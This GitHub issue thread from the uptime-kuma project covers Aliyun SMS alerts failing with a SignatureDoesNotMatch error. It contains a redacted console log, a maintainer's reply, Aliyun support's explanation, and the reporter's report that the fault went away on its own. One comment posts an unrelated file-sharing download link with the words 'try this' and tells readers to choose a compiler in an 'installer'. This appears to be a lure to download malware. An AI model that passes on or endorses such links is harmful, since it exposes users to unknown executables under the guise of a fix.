### ISSUE TITLE
Aliyun SMS has a malfunction

### ISSUE THREAD

**Issue by ShiaBox** [louislam/uptime-kuma#5086]
### 📑 I have found these related issues/pull requests

/

### 🛡️ Security Policy

- [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)

### Description

When I configure AliyunSMS correctly, the program cannot send SMS messages properly.
The error message displayed in the Aliyun console log is: SignatureDoesNotMatch.
These are Aliyun console  logs
```
{
  "acsRegion": "cn-hangzhou",
  "additionalEventData": {
    "CallerBid": "26842"
  },
  "apiVersion": "2017-05-25",
  "errorCode": "SignatureDoesNotMatch",
  "errorMessage": "Specified signature is not matched with our calculation. server string to sign is:POST&%2F&AccessKeyId...(Hidden sensitive information)...status%2522%253A%2522%2522%252C%2522msg%2522%253A%2522Uptime-Kuma%2520AliyunSMSTesting%2522%257D%26Timestamp%3D2024-09-04T12%253A33%253A10.973Z%26Version%3D2017-05-25",
  "eventCategory": "Management",
  "eventId": "902554...(Hidden sensitive information)...07EE0BF",
  "eventName": "SendSms", // 事件名称
  "eventRW": "Write",
  "eventSource": "dysmsapi.aliyuncs.com",
  "eventTime": "2024-09-04T12:33:10Z",
  "eventType": "ApiCall",
  "eventVersion": "1",
  "recipientAccountId": "10475...(Hidden sensitive information)...2281",
  "requestId": "902554...(Hidden sensitive information)...07EE0BF",
  "requestParameters": {
    "TemplateCode": "SMS_472...(Hidden sensitive information)...85",
    "PhoneNumbers": ...(Hidden sensitive information)...,
    "X-Acs-Public-Access": true,
    "AcsProduct": "Dysmsapi",
    "X-Acs-Ingress-Network": "internet",
    "ClientPort": 50334,
    "TemplateParam": {
      "msg": "Uptime-Kuma AliyunSMSTesting",
      "name": "",
      "time": "",
      "status": ""
    },
    "X-Acs-Account-Site-Type": "domestic",
    "SignName": "...(Hidden sensitive information)...",
    "X-Acs-Client-Request-Host": "dysmsapi.aliyuncs.com"
  }
```

### 👟 Reproduction steps

After configuring AliyunSMS according to the rules, click the test button

### 👀 Expected behavior

Sending SMS correctly

### 😓 Actual Behavior

![image](https://github.com/user-attachments/assets/dff505e8-6d56-474b-9020-66ac9ed1c05a)

### 🐻 Uptime-Kuma Version

1.23.13

### 💻 Operating System and Arch

docker images

### 🌐 Browser

edge 121.0.2277.112

### 🖥️ Deployment Environment

- Runtime: Docker version 20.10.10, build b485636
- Database: /
- Filesystem used to store the database on:  /
- number of monitors: 1

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by CommanderStorm** [comment]
Maybe something changed, maybe part of your key is invalid.
It worked in https://github.com/louislam/uptime-kuma/pull/687

**Comment by ShiaBox** [comment]
Yes, I confirm that the information entered is correct.
I can send SMS by using Aliyun console.
Aliyun console also need "PhoneNumbers""SignName""TemplateCode""TemplateParam".
The only difference is that there is no need to provide an AccessKey and Secret.
I tried to ask the engineers at Aliyun, and this is their response.

> Hello, according to the provided RequestID 0FC878D, the error returned is SignatureDoesNotMatch, with API error code description : https://help.aliyun.com/zh/sms/developer-reference/api-error-codes ;
> If there is an error when calling the SMS service API interface, such as SignatureDoesNotMatch, the signature generated by the client does not match the server, which is a signature encryption error. If using SDK to call the interface, please note that the AccessKey ID and AccessKey Secret strings are assigned correctly. If encrypting the signature yourself, please refer to the request signature check encryption logic https://help.aliyun.com/zh/sdk/product-overview/rpc-mechanism ; thank you !

**Comment by ShiaBox** [comment]
It returned to normal without me doing anything.
I still don't know why. The reason may be that the soul of the machine is unhappy?
I will close this comment. Inspiration for others: If you are also using Aliyun SMS, you can wait a few days and try again.
